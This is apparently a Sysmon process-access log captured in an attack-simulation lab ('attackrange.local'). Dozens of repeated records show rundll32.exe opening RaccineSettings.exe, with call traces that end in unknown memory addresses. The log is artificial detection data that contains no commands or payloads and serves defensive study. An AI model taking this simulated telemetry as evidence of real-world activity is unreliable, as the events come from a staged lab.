Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043425Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043424Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043423Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043422Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043421Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043420Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043419Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043418Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043417Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043416Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043415Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043414Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043413Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043412Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043411Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043410Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043409Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043408Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043407Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043406Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043405Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043404Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043403Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043402Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043401Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043400Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043399Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043398Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043397Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043396Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043395Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043394Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043393Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043392Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043391Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043390Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043389Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043388Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.867{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043387Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043386Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043385Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043384Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043383Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043382Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043381Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043380Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043379Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043378Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043377Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043376Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043375Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043374Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043373Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043372Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043371Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043370Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043369Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043368Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043367Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043366Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043365Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043364Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 10341000x80000000000000002043363Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:27.866{9DBE88B5-2F5E-61B2-AB03-010000000E02}55681464C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(0000019C1AA48C59) 